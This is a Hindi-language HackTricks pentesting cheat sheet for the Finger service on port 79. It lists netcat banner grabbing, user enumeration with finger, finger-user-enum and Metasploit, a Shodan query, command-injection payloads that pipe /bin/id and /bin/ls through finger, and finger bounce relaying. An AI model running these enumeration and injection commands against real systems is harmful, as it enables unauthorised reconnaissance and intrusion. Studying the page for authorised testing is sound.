79 - Pentesting Finger

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

बुनियादी जानकारी

Finger प्रोग्राम/सेवा का उपयोग कंप्यूटर उपयोगकर्ताओं के बारे में विवरण प्राप्त करने के लिए किया जाता है। आमतौर पर, प्रदान की गई जानकारी में उपयोगकर्ता का लॉगिन नाम, पूरा नाम और, कुछ मामलों में, अतिरिक्त विवरण शामिल होते हैं। ये अतिरिक्त विवरण कार्यालय का स्थान और फोन नंबर (यदि उपलब्ध हो), उपयोगकर्ता के लॉगिन करने का समय, निष्क्रियता की अवधि (आइडल टाइम), उपयोगकर्ता द्वारा पढ़ा गया अंतिम ईमेल, और उपयोगकर्ता की योजना और परियोजना फ़ाइलों की सामग्री शामिल हो सकते हैं।

डिफ़ॉल्ट पोर्ट: 79

PORT   STATE SERVICE
79/tcp open  finger

सूचना संग्रहण

बैनर ग्रैबिंग/बुनियादी कनेक्शन

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

उपयोगकर्ता गणना

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

वैकल्पिक रूप से, आप pentestmonkey से finger-user-enum का उपयोग कर सकते हैं, कुछ उदाहरण:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap डिफ़ॉल्ट स्क्रिप्ट का उपयोग करके स्क्रिप्ट निष्पादित करता है

Metasploit Nmap की तुलना में अधिक तरकीबें का उपयोग करता है

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

कमांड निष्पादन

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

एक सिस्टम को फिंगर रिले के रूप में उपयोग करें

finger user@host@victim
finger @internal@external

Tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें